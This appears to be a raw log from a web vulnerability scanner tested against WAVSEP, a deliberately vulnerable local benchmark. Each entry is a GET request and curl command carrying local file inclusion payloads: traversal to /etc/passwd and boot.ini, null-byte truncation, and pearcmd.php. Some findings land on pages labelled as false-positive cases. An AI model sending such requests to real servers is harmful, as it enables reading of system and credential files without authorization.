GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-FalsePositives-GET/Case07-LFI-FalsePositive-FileClass-TextHtmlValidResponse-FilenameContext-EnumerationResponseOnly-OSPath-DefaultRelativeInput-NoPathReq-Read.jsp?target=%2Froot%2Fapache-tomcat-8.0.27%2Fwebapps%2Fwavsep%2Factive%2FLFI%2FLFI-FalsePositives-GET%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
